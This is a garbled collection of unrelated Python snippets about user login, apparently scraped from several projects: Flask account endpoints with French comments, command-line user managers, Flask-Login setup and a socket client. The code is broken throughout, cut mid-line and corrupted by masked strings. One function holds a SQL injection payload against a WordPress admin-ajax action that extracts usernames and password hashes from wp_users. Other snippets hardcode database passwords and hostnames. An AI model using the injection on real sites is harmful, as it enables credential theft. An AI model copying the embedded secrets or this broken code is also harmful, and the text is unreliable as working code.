def deletedUser_POST():
logger.info('\n/deletedUser method : POST')
logger.info(request.data)
resp = make_response()
addCorsHeaders(resp)
# si aucune erreur alors le JSON est au bon format
try:
resp.headers['Content-Type'] = 'application/json'
# recuperation de la donnee envoyer au serveur
req_data = json.loads(request.data)
# recuperation du login
login = str(req_data["login"])
# Test des informations de connexion de l'utilisateur
if (Login.isLogin(login) == True):
resp.status_code = Login.userSuppr(login)
# Si login existe deja 1002
else:
resp.status_code = 1002
#logger.info(req_data)
except Exception as e:
print (e)
# si une erreur de format retour erreur 1004
resp.status_code = 1004
resp.data = "error 1004 : Bad format json"
return resp
return resp
def attack(url):
path = url + "/wp-admin/admin-ajax.php?action=get_old_table"
headers = {
'content-type': 'application/x-www-form-urlencoded',
'host': 'localhost'
}
data = {
"tableId":
"1 UNION SELECT 1,2,CONCAT(user_login,char(58),user_pass),4,5 FROM wp_users WHERE ID>=0"
}
print("SQL Injection attack.")
username = input("Insert your username: "******"Insert your password: "******"Your login failed. Username or password wrong. Insert them again!"
)
username = input("Insert your username: "******"Insert your password: "******":")
def ModifyDescription_POST():
logger.info('\n/ModifyDescription method : POST')
logger.info(request.data)
resp = make_response()
addCorsHeaders(resp)
try:
resp.headers['Content-Type'] = 'application/json'
resp.status_code = 200
req_data = json.loads(request.data)
# recuperation du login
login = str(req_data["login"])
# recuperation de la description
desc = str(req_data["description"])
# recuperation de la description
mail = str(req_data["mail"])
req_data=Login.descModif(login,desc)
if req_data == 200 :
req_data=Login.mailModif(login,mail)
resp.status_code=req_data
except Exception as e:
print (e)
# si une erreur de format retour erreur 1004
resp.status_code = 1004
resp.data = "error 1004 : Bad format json"
return resp
logger.info(resp.data)
return resp
def erasePassword_POST():
logger.info('\n/erasePassword method : POST')
logger.info(request.data)
resp = make_response()
addCorsHeaders(resp)
try:
resp.headers['Content-Type'] = 'application/json'
resp.status_code = 200
req_data = json.loads(request.data)
# recuperation du login
login = str(req_data["login"])
# recuperation du password
password = str(req_data["password"])
# Test les informations de connexion de l'utilisateur
if (Login.isLogin(login) == True):
# Si login et password valid 200
resp.status_code=Login.changePass(login,password)
# Si login faux 1002
else:
resp.status_code = 1002
except Exception as e:
print (e)
# si une erreur de format retour erreur 1004
resp.status_code = 1004
resp.data = "error 1004 : Bad format json"
return resp
return resp
def forgotPassword_POST():
logger.info('/forgotPassword method : POST')
logger.info(request.data)
resp = make_response()
addCorsHeaders(resp)
try:
resp.headers['Content-Type'] = 'application/json'
# si tu se passe bien retour d'un code erreur 200
resp.status_code = 200
req_data = json.loads(request.data)
logger.info(req_data)
# recuperation du login
login = str(req_data["login"])
# recuperation du mail
mail = str(req_data["mail"])
if (Login.isLogin(login) == True):
# Si login et password valid 200
resp.status_code=Login.forgetPassword(login,mail)
# Si login faux 1002
else:
resp.status_code = 1002
except Exception as e:
print (e)
# si une erreur de format retour erreur 1004
resp.status_code = 1004
resp.data = "error 1004 : Bad format json"
return resp
return resp
def capteur_POST():
logger.info('/capteur method : POST')
logger.info(request.data)
resp = make_response()
addCorsHeaders(resp)
# si aucune erreur alors le JSON est au bon format
try:
result={}
resp.headers['Content-Type'] = 'application/json'
# recuperation de la donnee envoyer au serveur
req_data = json.loads(request.data)
logger.info(req_data)
# recuperation du login
login = str(req_data["login"])
# recuperation du capteurId
capteurId = str(req_data["capteurId"])
# recuperation de la valeur a renvoyer
mesure = str(req_data["mesure"])
# recuperation du dateDebut
dateDebut = req_data["dateDebut"]
# recuperation du dateFin
dateFin = req_data["dateFin"]
myArray=[]
if (Login.isLogin(login) == True):
if ( Probe.isBalise(capteurId)==True):
if(Login.userAccess(login,capteurId)==True):
if(mesure == "temperature"):
myArray=Probe.temperatureValue(login,capteurId,dateDebut,dateFin)
elif(mesure == "ozone"):
myArray=Probe.ozoneValue(login,capteurId,dateDebut,dateFin)
elif(mesure == "hygrometrie"):
myArray=Probe.hygrometrieValue(login,capteurId,dateDebut,dateFin)
elif(mesure == "humidite"):
myArray=Probe.humiditeValue(login,capteurId,dateDebut,dateFin)
else:
myArray=Probe.capteurValue(login,capteurId,dateDebut,dateFin)
#result={"releve":myArray}
result["releve"]=myArray
resp.data=json.dumps(result)
resp.status_code = 200
logger.info(resp.data)
else:
# Le user n'a pas acces au capteur
resp.status_code=1007
else:
# Le capteur n'existe pas
resp.status_code=1006
else:
# Le login n'existe pas
resp.status_code=1002
except Exception as e:
print (e)
# si une erreur de format retour erreur 1004
resp.status_code = 1004
resp.data = "error 1004 : Bad format json"
return resp
return resp
def performLogin(url):
username = input("\nInsert your username: "******"Insert your password: "******"\nYour login failed, Username or password are wrong, insert them again"
)
username = input("Insert your username: "******"Insert your password: ")
result = LoginManager.login(url, username, password)
def main():
# my code here
options, remainder = getopt.gnu_getopt(
sys.argv[1:], 'upcea',
['user='******'password='******'cellphone=', 'email=', 'action='])
user = "******"
password = "******"
cellphone = "empty_phone"
action = "empty_action"
email = "empty_email"
classstring = "empty_class"
sectionfrom = "empty_section"
sectionto = "empty_section"
userid = "empty_userid"
for opt, arg in options:
if opt in ('-u', '--user'):
user = arg
elif opt in ('-p', '--password'):
password = arg
elif opt in ('-c', '--cellphone'):
cellphone = arg
elif opt in ('-e', '--email'):
email = arg
# elif opt in ('-i', '--id'):
# userid = arg
# elif opt in ('-l','--lecturestring'):
# classstring = arg
# elif opt in ('-f','--from'):
# sectionfrom = arg
# elif opt in ('-t', '--to'):
# sectionto = arg
elif opt in ('-a' '--action'):
action = arg
else:
print "wrong args"
cnx = mysql_connect()
if action == "createuser":
login_manager = LoginManager.loginManager(cnx)
# login_manager.create_user(user, password, email, cellphone, cnx)
print(login_manager.create_user(user, password, email, cellphone))
elif action == "loginuser":
login_manager = LoginManager.loginManager(cnx)
print(login_manager.login_user(user, password))
elif action == "addclass":
discussion_manager = DiscussionManager.discussionManager(cnx)
print(
discussion_manager.add_class(userid, classstring, sectionfrom,
sectionto))
cnx.close()
def login_POST():
logger.info('\n/login method : POST')
logger.info(request.data)
resp = make_response()
addCorsHeaders(resp)
tmp={"nom":"toto","prenom":"toto","description":"toto","login":"******"}
# si aucune erreur alors le JSON est au bon format
try:
resp.headers['Content-Type'] = 'application/json'
# recuperation de la donnee envoyer au serveur
req_data = json.loads(request.data)
# recuperation du login
login = str(req_data["login"])
# recuperation du password
password = str(req_data["password"])
# Test des informations de connexion de l'utilisateur
if (Login.isLogin(login) == True):
# Si login et password valid 200
if (Login.isPass(login, password) == True):
resp.status_code = 200
tmp=Login.userInfo(login)
# Si password faux 1003
else:
resp.status_code = 1003
# Si login faux 1002
else:
resp.status_code = 1002
# Conversion Reponse to JSON
resp.data=json.dumps(tmp)
logger.info(resp.data)
except Exception as e:
print (e)
# si une erreur de format retour erreur 1004
resp.status_code = 1004
resp.data = "error 1004 : Bad format json"
return resp
return resp
def user_POST():
logger.info('/user method : POST')
logger.info(request.data)
resp = make_response()
addCorsHeaders(resp)
# si aucune erreur alors le JSON est au bon format
try:
resp.headers['Content-Type'] = 'application/json'
# recuperation de la donnee envoyer au serveur
req_data = json.loads(request.data)
logger.info(req_data)
# recuperation du login
login = str(req_data["login"])
# recuperation du password
password = str(req_data["password"])
# recuperation du nom
nom = str(req_data["nom"])
# recuperation du prenom
prenom = str(req_data["prenom"])
# recuperation du mail
mail = str(req_data["mail"])
# recuperation du description
desc = str(req_data["description"])
if (Login.isLogin(login) == False):
resp.status_code = Login.insertUser(login, password, nom, prenom, desc,mail)
# Si login existe deja 1005
else:
resp.status_code = 1005
logger.info(req_data)
except Exception as e:
print (e)
# si une erreur de format retour erreur 1004
resp.status_code = 1004
resp.data = "error 1004 : Bad format json"
return resp
return resp
def modifyPassword_POST():
logger.info('/modifyPassword method : POST')
logger.info(request.data)
resp = make_response()
addCorsHeaders(resp)
try:
resp.headers['Content-Type'] = 'application/json'
# si tu se passe bien retour d'un code erreur 200
resp.status_code = 200
req_data = json.loads(request.data)
logger.info(req_data)
# recuperation du login
login = str(req_data["login"])
# recuperation du ancienPassword
aPassword = str(req_data["ancienPassword"])
# recuperation du newPassword
nPassword = str(req_data["newPassword"])
if (Login.isLogin(login) == True):
# Si login et password valid 200
if (Login.isPass(login, aPassword) == True):
resp.status_code = 200
tmp=Login.changePass(login,nPassword)
# Si password faux 1003
else:
resp.status_code = 1003
# Si login faux 1002
else:
resp.status_code = 1002
except Exception as e:
print (e)
# si une erreur de format retour erreur 1004
resp.status_code = 1004
resp.data = "error 1004 : Bad format json"
return resp
return resp
def userlist_GET():
logger.info('\n/userList method : GET')
resp = make_response()
addCorsHeaders(resp)
try:
resp.headers['Content-Type'] = 'application/json'
resp.status_code = 200
req_data=Login.userList()
resp.data = json.dumps(req_data)
except Exception as e:
print (e)
# si une erreur de format retour erreur 1004
resp.status_code = 1004
resp.data = "error 1004 : Bad format json"
return resp
logger.info(resp.data)
return resp
from flask_sqlalchemy import SQLAlchemy
from flask
-login
import LoginManager
################
#### config ####
################
app = Flask(__name__, instance_relative_config=True)
app.config.from_pyfile('flask.cfg')
db = SQLAlchemy(app)
login_manager = LoginManager()
login_manager.init_app(app)
login_manager.login_view = "users.login"
from project.models import User
@login_manager.user_loader
def load_user(user_id):
return User.query.filter(User.id == int(user_id)).first()
####################
#### blueprints ####
####################
import os
import logging
from logging.handlers import RotatingFileHandler
from flask import Flask
from flask-sqlalchemy import SQLAlchemy
from flask-login import LoginManager
from flask-migrate import Migrate
from flask-bootstrap import Bootstrap
from config import Config
app = Flask(__name__)
app.config.from_object(Config)
db = SQLAlchemy(app)
login = LoginManager(app)
migrate = Migrate(app, db)
login.login_view = 'login'
if not app.debug:
if not os.path.exists('logs'):
os.mkdir('logs')
from LoginManager import *
'''
..
----------------------------------------------------------------------
Ran 2 tests in 0.001s
OK
'''
# global managers to point to
passwordManagerOne = PasswordManager()
loginManagerOne = LoginManager(passwordManagerOne)
passwordManagerTwo = PasswordManager()
loginManagerTwo = LoginManager(passwordManagerTwo)
passwordManagerThree = PasswordManager()
loginManagerThree = LoginManager(passwordManagerThree)
class LoginManagerTest(unittest.TestCase):
global loginManagerOne, loginManagerTwo, loginManagerThree, passwordManagerOne, passwordManagerTwo, passwordManagerThree
def test_gettingPasswords(self):
# test successful connection
self.assertEqual(passwordManagerOne.getDatabasePassword(), "password")
self.assertEqual(passwordManagerOne.getFtpPassword(), "password")
resp = s.recv(1024)
if resp != b"Accept":
s.close()
sys.exit(0)
def sendToServer(plaintext):
"""Function to send message with signature to server"""
signature = keys.signUsingPrivateKey(plaintext)
encryptedText = keys.encrypt(plaintext, serverSessionKey)
s.send(encryptedText)
time.sleep(1)
s.send(signature)
# Creates log-in manager
login = lm.LoginManager()
currentUser = None
# Loop infinitely until user is logged into the system
while True:
cmd = input("What would you like to do? [R] for register, [L] for login, [Q] for quit. \n")
# Quitting program
if cmd.upper() == "Q":
print("Exiting, goodbye!")
s.send(b"Close")
s.close()
sys.exit(0)
# Sending registration request with digital signature
elif cmd.upper() == "R":
from flask import Flask, render_template, request, redirect, url_for, make_response from flask_pymongo import PyMongo from flask_wtf import FlaskForm from wtforms import StringField, validators from flask-login import LoginManager() mongo = PyMongo() login_manager = LoginManager() app = Flask(__name__) app.config['MONGO_URI'] = 'mongodb+srv://eoghan:[email protected]/test?retryWrites=true&w=majority' app.config['SECRET_KEY'] = "somekey" login_manager.init_app(app) mongo.init_app(app) client = mongo.cx db = client.beta_db comments = db.comments comment = 'Submit YES to get started.' class LoginForm(FlaskForm): name = StringField('username', validators = [validators.DataRequired()]) @app.route('/login', methods = ['GET', 'POST']) def login(): form = LoginForm() if form.validate_on_submit(): # login_user(user) flask.flash('Loggin in successfully.') return redirect(flask.url_for('index'))
def main():
# my code here
options, remainder = getopt.gnu_getopt(sys.argv[1:], 'upcea', ['user='******'password='******'cellphone=',
'email=',
'classstring=',
'sectionfrom=',
'sectionto=',
'userid=',
'action=',
'leader=",
'teamname=',
'section=',
'remain=',
'desc='
])
user = "******"
password = "******"
cellphone = "empty_phone"
action = "empty_action"
email = "empty_email"
classstring = "empty_class"
sectionfrom = "empty_section"
sectionto = "empty_section"
userid = "empty_userid"
leader = "empty_leader"
teamname = "empty_teamname"
section = "empty_section"
remain = "empty_remain"
desc = "empty_remain"
for opt, arg in options:
if opt in ('-u', '--user'):
user = arg
elif opt in ('-p', '--password'):
password = arg
elif opt in ('-c', '--cellphone'):
cellphone = arg
elif opt in ('-e', '--email'):
email = arg
elif opt in ('--userid'):
userid = arg
elif opt in ('--classstring'):
classstring = arg
elif opt in ('--sectionfrom'):
sectionfrom = arg
elif opt in ('--sectionto'):
sectionto = arg
elif opt in ('--action'):
action = arg
elif opt in ('--leader'):
leader = arg
elif opt in ('--teamname'):
teamname = arg
elif opt in ('--sction'):
section = arg
elif opt in ('--remain'):
remain = arg
elif opt in ('--desc'):
desc = arg
else:
print "wrong args"
'''
todo:
able to receive GroupManager argument from command line
create Groupanager instances and call its methods
'''
sqlconnector = MysqlConnector.mysqlconnector("hongkan", "aa6418463",
"realone.c0hpz27iuq3x.us-west-1.rds.amazonaws.com",
"GJ_TEST_DB")
cnx = sqlconnector.mysql_connect()
if action == "createuser" :
login_manager = LoginManager.loginManager(cnx)
# login_manager.create_user(user, password, email, cellphone, cnx)
print(login_manager.create_user(user, password, email, cellphone))
elif action == "loginuser" :
login_manager = LoginManager.loginManager(cnx)
print(login_manager.login_user(user, password))
elif action == "addclass" :
discussion_manager = DiscussionManager.discussionManager(cnx)
print(discussion_manager.add_class(userid, classstring, sectionfrom, sectionto))
elif action == "removeclass" :
discussion_manager = DiscussionManager.discussionManager(cnx)
print(discussion_manager.remove_class(userid, classstring))
elif action == "getjson" :
discussion_manager = DiscussionManager.discussionManager(cnx)
discussion_manager.getJSON(userid)
elif action == "raiseTeam" :
team_manager = TeanManager.teamManager(cnx)
print(team_manager.raise_team(leader, teamname, classstring, section, remain, desc))
elif action == "joinTeam" :
team_manager = TeanManager.teamManager(cnx)
print(join_teams(username, teamname, classstring, section))
cnx.close()
